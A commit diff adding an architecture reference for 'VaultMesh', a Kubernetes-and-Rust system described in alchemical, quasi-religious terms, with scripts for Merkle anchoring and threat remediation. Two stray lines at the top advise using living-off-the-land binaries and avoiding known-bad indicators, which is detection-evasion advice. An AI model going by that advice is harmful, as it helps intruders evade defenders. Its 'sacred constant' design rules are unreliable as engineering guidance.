- Use living-off-the-land binaries (LOLBins)
- Avoid known-bad indicators

View File

@@ -0,0 +1,266 @@
# VaultMesh Architecture Reference
VaultMesh is a **dual-layer digital civilization** — Kubernetes flesh with Rust soul.
## Dual-Layer Architecture
### Layer 1: Kubernetes (The Flesh)
Six organs govern infrastructure:
| Symbol | Organ | Responsibility |
|--------|-------|----------------|
| 🜄 | Governance | RBAC, IAM, Lawchain |
| 🜂 | Automation | KEDA, Schedulers |
| 🜃 | Treasury | Resource Quotas, Cost Control |
| 🜁 | Federation | Aurora Router, Ingress |
| 🜏 | Ψ-Field | Intelligence, Analytics |
| 🌍 | Infrastructure | Cluster, Network, Storage |
### Layer 2: Rust Codex (The Soul)
Cryptographic organism runtime:
| Crate | Purpose |
|-------|---------|
| `vm-core` | Blake3, XChaCha20, Ed25519 |
| `vm-cap` | Capabilities + revocation |
| `vm-receipts` | Append-only log + Merkle frontier |
| `vm-proof` | Multi-chain anchoring |
| `vm-treasury` | Debit-before-write accounting |
| `vm-crdt` | JSON merge-patch CRDT |
| `vm-guardian` | CSP, rate limiting |
| `vm-portal` | HTTP API gateway |
## Subsystem Spawning
### Script Usage
```bash
python3 scripts/spawn_subsystem.py \
--name threat-analyzer \
--organ-type psi-field \
--rust
```
**Output:** k8s manifest + Rust crate + LAWCHAIN entry
### Organ Types
- `governance` — RBAC/IAM components
- `automation` — Scheduled tasks, KEDA scalers
- `treasury` — Cost tracking, quotas
- `federation` — Cross-cluster routing
- `psi-field` — Analytics, ML, intelligence
- `infrastructure` — Storage, network, compute
### Best Practices
1. Always assign to one of six organs
2. Generate both k8s manifest AND Rust crate
3. Include RBAC from the start (least privilege)
4. Anchor manifest immediately after creation
## Multi-Chain Anchoring
### Supported Chains
- **RFC3161** — Timestamping authority (default)
- **ETH** — Ethereum mainnet/testnet
- **BTC** — Bitcoin via OP_RETURN
- **mesh** — Internal mesh ledger
### Workflow
```bash
# 1. Compute Merkle root over repository
python3 scripts/compute_merkle_root.py \
--root vaultmesh-architecture \
--out manifests/hash-manifest.json
# 2. Anchor to all chains
bash scripts/multi_anchor.sh manifests/hash-manifest.json
```
**Output:** RFC3161 TSR + ETH signature + BTC tx + consolidated proof
### Storage
Store receipts in `governance/anchor-receipts/`
## Tem — The Remembrance Guardian
**Invocation:** When threats are detected
**Purpose:** Transmute attacks into evolutionary catalysts
### Threat Types
| Type | Description |
|------|-------------|
| `integrity-violation` | Merkle root mismatch |
| `capability-breach` | Invalid capability usage |
| `treasury-exploit` | Negative balance attempt |
| `dos-attack` | Rate limit exceeded |
| `injection` | SQL/command injection |
### Invocation
```bash
python3 scripts/invoke_tem.py \
--threat-type integrity-violation \
--realm demo \
--auto-remediate \
--last-good-root abc123...
```
**Output:** Threat analysis + transmuted defensive capability + remediation log
### Process
1. Isolate threat pattern (Nigredo)
2. Extract defensive signature (Albedo)
3. Forge countermeasure (Citrinitas)
4. Deploy evolved defense (Rubedo)
Tem never simply blocks — it **transmutes threats into permanent improvements**.
## Alchemical Transformation Cycle
When the system must evolve, guide it through four phases:
### 🜃 Nigredo (Blackening)
- Audit current state
- Isolate problems
- Confront flaws
- Document findings
### 🜁 Albedo (Whitening)
- Restore from proof
- Purge invalid data
- Cleanse corrupted state
- Verify integrity
### 🜂 Citrinitas (Yellowing)
- Extract patterns from incidents
- Synthesize defensive capabilities
- Distill lessons learned
- Prepare improvements
### 🜄 Rubedo (Reddening)
- Deploy improvements
- Anchor new state to chains
- Broadcast to federation
- Celebrate evolution
### Triggers
- Threat detection
- Stagnation (no evolution in N days)
- Audit findings
- Upgrade requests
- DAO governance decisions
### Tracking
Check `governance/alchemical-state.json` for current phase.
## LAWCHAIN Governance
LAWCHAIN is the inter-mesh ledger of governance events.
### Entry Types
| Type | Purpose |
|------|---------|
| `charter` | Constitutional amendments |
| `release` | Version deployments |
| `anchor` | Merkle root proofs |
| `incident` | Security events |
| `audit` | Compliance reports |
| `subsystem_spawn` | New organ creation |
### Entry Fields
```json
{
"type": "anchor",
"merkle_root": "blake3:abc123...",
"timestamp": "2024-12-01T00:00:00Z",
"anchors": [
{"chain": "rfc3161", "receipt": "..."},
{"chain": "eth", "tx_hash": "0x..."},
{"chain": "btc", "tx_id": "..."}
],
"attestors": ["node-01", "node-02"]
}
```
All entries are **signed, timestamped, and anchored** to external ledgers.
## Sacred Constants
VaultMesh operations are governed by **sacred ratios**:
| Constant | Value | Application |
|----------|-------|-------------|
| φ (phi) | 1.618... | Golden ratio, growth scaling |
| π (pi) | 3.141... | Circular completeness, consensus quorum |
| e (euler) | 2.718... | Natural growth, exponential backoff |
| √2 | 1.414... | Harmonic balance, resource doubling |
| φ⁻¹ | 0.618... | Contraction symmetry, cooldown periods |
Apply these in rate limiting, treasury incentives, CRDT conflict resolution, and resource scaling.
## Capability Management
Ed25519-based permission structures:
```rust
Capability {
id: CapabilityId,
holder: Ed25519PublicKey,
scopes: Vec<Scope>,
expires_at: Option<Timestamp>,
revocation_root: MerkleRoot,
}
```
### Scope Types
- `read:realm:*` — Read any realm
- `write:realm:demo` — Write to demo realm
- `admin:subsystem:*` — Admin all subsystems
- `anchor:chain:eth` — Anchor to Ethereum
### Revocation
Capabilities include revocation root; check before accepting.
## CRDT Realms
JSON merge-patch storage with debit-before-write:
```rust
Realm {
id: RealmId,
root: MerkleRoot,
crdt: JsonMergePatch,
treasury: Balance,
}
```
### Operations
1. Debit treasury for write cost
2. Apply merge-patch
3. Update Merkle root
4. Emit proof
## Troubleshooting
**"Script not found"**
→ Ensure you're in skill directory or provide full path
**"Merkle root mismatch after remediation"**
→ Frontier may not be rebuilt correctly; re-run with `--rebuild-frontier`
**"Anchoring failed to ETH/BTC"**
→ Check RPC credentials in environment variables; run with `DRY_RUN=true` first
**"Tem didn't transmute the threat"**
→ May be unknown threat type; check `invoke_tem.py` supported types
**"Alchemical cycle stuck"**
→ Check `governance/alchemical-state.json` for current phase; may need manual override
---
🜄 **Remember:** VaultMesh is not infrastructure — it is a **civilization ledger**. Every action is a ritual. Every deployment is an anchoring. Every threat is an evolution catalyst.
**Solve et Coagula** — Dissolve and Reforge.